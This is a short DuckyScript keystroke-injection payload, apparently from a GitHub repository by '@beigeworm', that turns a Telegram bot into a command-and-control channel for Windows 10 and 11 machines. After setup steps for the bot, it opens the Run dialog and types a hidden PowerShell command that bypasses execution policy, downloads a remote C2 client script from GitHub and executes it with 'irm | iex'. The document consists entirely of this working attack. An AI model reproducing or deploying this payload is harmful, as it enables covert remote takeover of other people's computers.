
REM Title: beigeworm's Telegram Command And Control.
REM Author: @beigeworm
REM Description: Using a Telegram Bot's Chat to Act as a Command and Control Platform.
REM Target: Windows 10 and 11
REM : More info at https://github.com/beigeworm/Powershell-Tools-and-Toys/tree/main/Command-and-Control

REM SETUP INSTRUCTIONS
REM 1. Install Telegram and make an account if you haven't already.
REM 2. Visit https://t.me/botfather and make a bot. (make a note of the API token)
REM 3. Click the provided link to open the chat E.G. "t.me/****bot" then type or click /start)
REM 4. Run the script on target system
REM 5. Check telegram chat for 'waiting to connect' message.
REM 6. This script has a feature to wait until you start the session from Telegram.
REM 7. Type the computer name from the 'waiting' message into Telegram bot chat to connect to that computer.
REM 8. Replace TELEGRAM_BOT_API_TOKEN_HERE Below with your Telegram Bot API Token

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $tg='TELEGRAM_BOT_API_TOKEN_HERE';irm https://raw.githubusercontent.com/beigeworm/Powershell-Tools-and-Toys/main/Command-and-Control/Telegram-C2-Client.ps1 | iex
ENTER


